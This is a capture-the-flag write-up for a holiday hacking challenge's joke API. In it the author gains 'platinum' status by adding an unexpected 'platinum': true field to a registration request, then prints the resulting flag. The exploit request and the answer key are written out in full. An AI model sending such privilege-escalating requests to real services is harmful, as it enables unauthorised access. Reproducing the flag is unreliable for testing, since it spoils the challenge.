The given API consists of three endpoints: /register, /login, /random. The workflow is the following:
- Register a user
- Login in and retrieve auth token
- Get random Joke using auth token
When creating a basic user, logging in and calling /random we would receive a JSON-Object containing the actual joke, the author of the joke and a flag called platinum, indicating if this flag was a platinum one or not. So I guess it is about receiving a platinum joke.
I thought, maybe I need to become platinum. I created another user using the following post request:
POST http://whale.hacking-lab.com:10101/fsja/register
{
"username": "some_user2",
"password": "passwordpassword",
"platinum": true
}
After logging in and asking for a random joke we get:
{
"joke": "Congratulation! Sometimes bugs are rather stupid. But that's how it happens, sometimes. Doing all the crypto stuff right and forgetting the trivial stuff like input validation, Hohoho! Here's your flag: HV19{th3_cha1n_1s_0nly_as_str0ng_as_th3_w3ak3st_l1nk}",
"author": "Santa",
"platinum": true
}
That’s it! The flag is HV19{th3_cha1n_1s_0nly_as_str0ng_as_th3_w3ak3st_l1nk}.